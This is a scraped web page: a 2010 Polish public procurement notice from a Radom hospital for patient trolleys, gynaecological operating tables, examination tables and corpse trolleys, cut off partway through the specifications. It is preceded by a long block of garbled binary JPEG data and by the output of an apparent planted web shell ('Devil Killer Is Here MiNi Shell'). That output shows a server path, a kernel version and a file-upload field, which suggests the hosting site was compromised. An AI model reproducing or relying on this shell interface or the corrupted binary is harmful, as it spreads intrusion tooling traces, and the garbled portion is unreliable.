JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100226/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100226/42695-N-2010.html

<p class="kh_header"><b>Radom: Zakup, dostawa, montaż: wózka do przewożenia chorych (3), stołu operacyjnego (3), uniwersalnego stołu do badań (5), wózka do przewożenia zwłok (2) dla potrzeb wyposażenia Pawilonu Ginekologiczno Położniczego Radomskiego Szpitala Specjalistycznego</b><br>
<b>Numer ogłoszenia: 42695 - 2010; data zamieszczenia: 26.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Radomski Szpital Specjalistyczny im. dr Tytusa Chałubińskiego , ul. Tochtermana 1, 26-610 Radom, woj. mazowieckie, tel. 048 3615285, 3615284, faks 048 3615213.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.radom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup, dostawa, montaż: wózka do przewożenia chorych (3), stołu operacyjnego (3), uniwersalnego stołu do badań (5), wózka do przewożenia zwłok (2) dla potrzeb wyposażenia Pawilonu Ginekologiczno Położniczego Radomskiego Szpitala Specjalistycznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup, dostawa, montaż: wózka do przewożenia chorych (3), stołu operacyjnego (3), uniwersalnego stołu do badań (5), wózka do przewożenia zwłok (2) dla potrzeb wyposażenia Pawilonu Ginekologiczno Położniczego Radomskiego Szpitala Specjalistycznego według parametrów określonych poniżej:

Zakres nr 1 - WÓZEK DO PRZEWOŻENIA CHORYCH  szt.3
1.	Wózek do przewożenia chorych. Rok produkcji nie później niż 2009r.
2.	Szerokość całkowita: 800mm (+-30mm).
3.	Długość całkowita :2100 (+- 30mm).
4.	Regulacja wysokości  leża za pomocą nożnego siłownika hydraulicznego w zakresie 560-900mm (+-30mm).
5.	Wózek wykonany z profili stalowych pokrytych lakierem proszkowym epoksydowym odpornym na ścieranie i środki dezynfekcyjne.	
6.	Leże składające się z dwóch segmentów.
7.	Oparcie pleców regulowane dzięki zastosowaniu sprężyn gazowych z blokadą do 75o (+-5o).
8.	Przechył Trendelenburga: 18o (+-3 o).
9.	Przechył anty- Trendelenburga: 18o (+-3 o).
10.	Pozycja Trendelenburga oraz anty- Trendelenburga  uzyskiwana za pomocą nożnego siłownika hydraulicznego.
11.	Dźwignie do sterowania regulacją wysokości oraz przechyłami wzdłużnymi umieszczone od strony nóg pacjenta. 	
12.	Podwozie wózka zabudowane osłonami z tworzywa ABS.
13.	Leże wózka przepuszczalne dla promieni RTG, tunel i taca na kasetę RTG na całej długości leża.
14.	Materac zdejmowany wykonany z materiału nieprzemakalnego.
15.	Cztery koła jezdne z centralną blokadą jazdy wraz  z kołem kierunkowym o śr.min.200mm.
16.	Dźwignie hamulca umieszczone od strony głowy i nóg.
17.	Wózek wyposażony w -poręcze boczne, -stojak na kroplówkę -pasy do mocowania pacjenta.

Zakres nr 2 - STÓŁ OPERACYJNY SZT.3
1.	Stół do zabiegów ginekologicznych. Rok produkcji nie później niż 2009r.
2.	Stół operacyjny mobilny z jezdną podstawą w kształcie litery Y lub V, z szerokimi, podwójnymi kołami o średnicy wiekszej bądź równej 150mm.Centrum blokada kół. W pozycji zahamowanej stół musi stać na elektromechaniczne lub elektrohydrauliczne wysuwanych z podstawy nóżek.
3.	Napęd stołu elektromechaniczny.
4.	Blat stołu 5 segmentów, podgłówek, płyta plecowa górna i dolna, płyta centralna, podnóżek dzielony i rozchylany na boki (4 segmenty).
5.	Zasilanie stołu akumulatorowe i sieciowe.
6.	Zasilacz sieciowy z funkcją ładowania akumulatorów w spoczynku  lub i  w czasie pracy stołu zintegrowany w konstrukcji stołu (nie zewnętrzny).
7.	Regulacja wysokości blatu w zakresie mniejszym bądź równym 700  do  więcej lub mniej 1120 mm licząc do powierzchni blatu bez grubości materacy.	
8.	Grubość materaca głównego stołu min.50mm .
9.	Mechaniczne lub elektromechaniczne wypiętrzenie klatki piersiowej.	
10.	Przesuw wzdłużny większy bądź równy 250mm.
11.	Zakres przechyłów bocznych blatu większy bądź rónym 25o w obie strony od poziomu .
12.	Zakres przechyłu blatu w pozycji Trendelennburga- Antytrendelennburga większy bądź równy 30o	.
13.	Całkowita szerokość blatu 590mm (+- 10mm).
14.	Minimalna lista funkcji stołu obsługiwanych za pomocą pilota kablowego: -regulacja wysokości, -Pozycja Trendelennburga- Antytrendelennburga,- przechyły boczne,- ustawienie pozycji standardowej -regulacja pochylania płyty plecowej dowolnej, regulacja kąta pochylenia podnóżków, -aktywacja systemu blokowania podstawy.	
15.	Możliwość pełnej obsługi funkcji stołu z panelu sterującego (pełniącego również rolę sterownika awaryjnego) umieszczonego na kolumnie stołu. Panel wyposażony w przyciski automatycznej interpretacji komend pilota w pozycji normalna-odwrócona. Panel zlokalizowany po prawej lub lewej stronie stołu patrząc w osi długiej (nie pod blatem).
16.	Automatyczne zabezpieczenie przed niezamierzonym przechyłem blatu przy aktywacji panelu na kolumnie stołu poprzez konieczność przyciśnięcia jednocześnie dwóch przycisków celem aktywacji.	
17.	Regulacja segmentu nożnego w pionie większym bądź równym +- 90o.
18.	Regulacja wysokości i kąta podgłówka większym bądź równym+- 55o	.
19.	Regulacja kata pochylenia płyty plecowej dolnej większym bądź równym+85o-40o.
20.	Regulacja kąta pochylenia płyty plecowej górnej  większym bądź równym+90o 60o.
21.	Możliwość ułożenia głowy pacjenta po obu stronach stołu, możliwość zamiany miejscami segmentu głowy lub i płyty plecowej górnej z segmentem nożnym.
22.	Blaty pokryte materacami bezszwowymi, piankowymi przystosowanymi do dezynfekcji środkami powierzchniowo czynnymi. Materace zintegrowane funkcjonalne z konstrukcją stołu i możliwością odpinania (na zatrzaskach, nie na rzepach)o właściwościach przeciwodleżynowych wymagane  jest załączenie do oferty dokumentów - badań zagranicznych lub krajowych potwierdzających. Nie dopuszcza się stosowania (oferowania)materacy żelowych jako substytutu materacy głównych stołu o właściwościach przeciwodleżynowych. 	
23.	Pilot z sygnalizacją stanu załadowania akumulatorów.
24.	Serwisowanie, przeprowadzenie testów okresowych przez modem.
25.	Możliwość podłączenia stołu do  systemu  zintegrowanej Sali operacyjnej.
26.	Przezierność blatu na całej długości dla promieniowania RTG (z uwzględnieniem przesuwu wzdłużnego).	
27.	 Obciążalność  stołu większa bądź równa 300kg.
28.	Wszystkie elementy metalowe blatów wykonane ze stali nierdzewnej kwasoodpornej( z wyłączeniem przegubów).Nie dopuszcza się zastosowania stopów metali lekkich, zwłaszcza aluminium, w konstrukcji ramy blatu i kolumny.	
WYPOSAŻENIE:
29.	Podpora reki anestezjologiczna	-2szt.
30.	Podpora Goepela z uchwytem do szyny bocznej -2szt.	
31.	Miska zbiorcza ze stali nierdzewnej montowana na wysięgniku obrotowym do szyny bocznej/ 1 kpl.	
32.	Ekran parawanu anestezjologicznego 1 szt.	
33.	Pas do ciała 1 szt.	

Zakres nr 3 - UNIWERSALNY STÓŁ DO BADAŃ. SZT .5.
1. Uniwersalny, wielofunkcyjny stół zabiegowy. Rok produkcji nie później niż 2009r.
2. Szerokość powierzchni roboczej  większym bądź równym 600mm  , dł. Powierzchni roboczej  większym bądź równym 1900mm
3. Nośność stołu 150kg
4. 2-segmentowa powierzchnia robocza
5. Mechanicznie regulowana wysokość i oparcie pleców
6. Przechyły Trendelenburga i anty- Trendelenburga
7. Wyposażenie:  - miska zabiegowa, - podpórka ręki, - stojak kroplówki - schodek dla pacjenta.

Zakres nr 4 - WÓZEK DO PRZEWOŻENIA ZWŁOK szt. 2
1.	Wózek do przewożenia zwłok. Rok produkcji nie później niż 2009r.
2.	Konstrukcja metalowa pokryta lakierem proszkowym
3.	Regulacja wysokości mechanizmem śrubowym
4.	Zdejmowane leże służące jako nosze
5.	4 koła jezdne w tym 2 z blokadą
6.	Pokrywa wózka materiałowa lub z tworzywa.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.19.23.00-5, 33.19.22.30-3, 33.19.22.10-7, 33.94.80.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem udziału w postępowaniu jest wniesienie wadium w kwocie: 
1.	Zakres nr 1 -      900,00 zł /słownie: dziewięćset złotych/,
2.	Zakres nr 2 - 13.500,00 zł /słownie: trzynaście tysięcy pięćset złotych/,
3.	Zakres nr 3 -     700,00 zł /słownie: siedemset złotych/
4.	Zakres nr 4 -      560,00 zł /słownie: pięćset sześćdziesiąt złotych/</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.
Ocena spełniania tego warunku zostanie dokonana wg formuły spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykonał min 1 dostawę w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy w tym okresie, Ocena spełniania tego warunku zostanie dokonana wg formuły spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje odpowiednim potencjałem technicznym. Ocena spełniania tego warunku zostanie dokonana wg formuły spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia.Ocena spełniania tego warunku zostanie dokonana wg formuły spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca znajduje się w odpowiedniej sytuacji ekonomicznej i finansowej. Ocena spełniania tego warunku zostanie dokonana wg formuły spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>dokument potwierdzajacy wniesienie wadium.
Pełnomocnictwo jezeli ofertę składa pelnomocnik.
Parafowany wzór umowy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.radom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Radomski Szpital Specjalistyczny
Dział Zamówień Publicznych Funduszy Strukturalnych i Zaopatrzenia
Sekcja Zamówień Publicznych i funduszy Strukturalnych
26-610 Radom, ul. Lekarska 4, pok. nr 313.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.03.2010 godzina 13:00, miejsce: Radomski Szpital Specjalistyczny
Dział Zamówień Publicznych Funduszy Strukturalnych i Zaopatrzenia
Sekcja Zamówień Publicznych i funduszy Strukturalnych
26-610 Radom, ul. Lekarska 4, pok. nr 313.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zakup realizowany w ramarch Projektu kluczowego pt-Budowa pawilonu Ginekologiczno - Położniczego z wykorzystaniem istniejącej konstrukcji w radomskim Szpitalu Specjalistycznym im. Dr Tytusa Chałubińskiego wraz 
z jego wyposażeniem.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> 1.	Zakres nr 1 - Wózek do przewożenia chorych -3 szt.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Wózek do przewożenia chorych. Rok produkcji nie później niż 2009r.
2.	Szerokość całkowita: 800mm (+/-30mm).
3.	Długość całkowita :2100 (+/- 30mm).
4.	Regulacja wysokości  leża za pomocą nożnego siłownika hydraulicznego w zakresie 560-900mm (+/-30mm).
5.	Wózek wykonany z profili stalowych pokrytych lakierem proszkowym epoksydowym odpornym na ścieranie i środki dezynfekcyjne.	
6.	Leże składające się z dwóch segmentów.
7.	Oparcie pleców regulowane dzięki zastosowaniu sprężyn gazowych z blokadą do 75o (+/-5o).
8.	Przechył Trendelenburga: 18o (+/-3 o).
9.	Przechył anty- Trendelenburga: 18o (+/-3 o).
10.	Pozycja Trendelenburga oraz anty- Trendelenburga  uzyskiwana za pomocą nożnego siłownika hydraulicznego.
11.	Dźwignie do sterowania regulacją wysokości oraz przechyłami wzdłużnymi umieszczone od strony nóg pacjenta. 	
12.	Podwozie wózka zabudowane osłonami z tworzywa ABS.
13.	Leże wózka przepuszczalne dla promieni RTG, tunel i taca na kasetę RTG na całej długości leża.
14.	Materac zdejmowany wykonany z materiału nieprzemakalnego.
15.	Cztery koła jezdne z centralną blokadą jazdy wraz  z kołem kierunkowym o śr.min.200mm.
16.	Dźwignie hamulca umieszczone od strony głowy i nóg.
17.	Wózek wyposażony w -poręcze boczne,; -stojak na kroplówkę ;-pasy do mocowania pacjenta..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.23.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakres nr 2 - STÓŁ OPERACYJNY SZT.3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Stół do zabiegów ginekologicznych. Rok produkcji nie później niż 2009r.
2.	Stół operacyjny mobilny z jezdną podstawą w kształcie litery Y lub V, z szerokimi, podwójnymi kołami o średnicy większej bądź równej 150mm.Centrum blokada kół. W pozycji zahamowanej stół musi stać na elektromechaniczne lub elektrohydrauliczne wysuwanych z podstawy nóżek.
3.	Napęd stołu elektromechaniczny.
4.	Blat stołu 5 segmentów, podgłówek, płyta plecowa górna i dolna, płyta centralna, podnóżek dzielony i rozchylany na boki (4 segmenty).
5.	Zasilanie stołu akumulatorowe i sieciowe.
6.	Zasilacz sieciowy z funkcją ładowania akumulatorów w spoczynku  lub/i  w czasie pracy stołu zintegrowany w konstrukcji stołu (nie zewnętrzny).
7.	Regulacja wysokości blatu w zakresie mniejszym bądź równym 700  do  większym bądź równym 1120 mm licząc do powierzchni blatu bez grubości materacy.	
8.	Grubość materaca głównego stołu min.50mm .
9.	Mechaniczne lub elektromechaniczne wypiętrzenie klatki piersiowej.	
10.	Przesuw wzdłużny większy bądź równy 250mm.
11.	Zakres przechyłów bocznych blatu większy bądź równy 25o w obie strony od poziomu .
12.	Zakres przechyłu blatu w pozycji Trendelennburga / Antytrendelennburga większy bądź równy 30o	.
13.	Całkowita szerokość blatu 590mm (+/- 10mm).
14.	Minimalna lista funkcji stołu obsługiwanych za pomocą pilota kablowego: -regulacja wysokości; -Pozycja Trendelennburga/ Antytrendelennburga;- przechyły boczne;- ustawienie pozycji standardowej; -regulacja pochylania płyty plecowej dowolnej; regulacja kąta pochylenia podnóżków; -aktywacja systemu blokowania podstawy.	
15.	Możliwość pełnej obsługi funkcji stołu z panelu sterującego (pełniącego również rolę sterownika awaryjnego) umieszczonego na kolumnie stołu. Panel wyposażony w przyciski automatycznej interpretacji komend pilota w pozycji normalna/odwrócona. Panel zlokalizowany po prawej lub lewej stronie stołu patrząc w osi długiej (nie pod blatem).
16.	Automatyczne zabezpieczenie przed niezamierzonym przechyłem blatu przy aktywacji panelu na kolumnie stołu poprzez konieczność przyciśnięcia jednocześnie dwóch przycisków celem aktywacji.	
17.	Regulacja segmentu nożnego w pionie większa bądź równa +/- 90o.
18.	Regulacja wysokości i kąta podgłówka większa bądź równa+/- 55o	.
19.	Regulacja kata pochylenia płyty plecowej dolnej większa bądź równa+85o/-40o.
20.	Regulacja kąta pochylenia płyty plecowej górnej większa bądź równa+90o/60o.
21.	Możliwość ułożenia głowy pacjenta po obu stronach stołu, możliwość zamiany miejscami segmentu głowy lub/i płyty plecowej górnej z segmentem nożnym.
22.	Blaty pokryte materacami bezszwowymi, piankowymi przystosowanymi do dezynfekcji środkami powierzchniowo czynnymi. Materace zintegrowane funkcjonalne z konstrukcją stołu i możliwością odpinania (na zatrzaskach; nie na rzepach)o właściwościach przeciwodleżynowych wymagane  jest załączenie do oferty dokumentów / badań zagranicznych lub krajowych potwierdzających. Nie dopuszcza się stosowania (oferowania)materacy żelowych jako substytutu materacy głównych stołu o właściwościach przeciwodleżynowych. 	
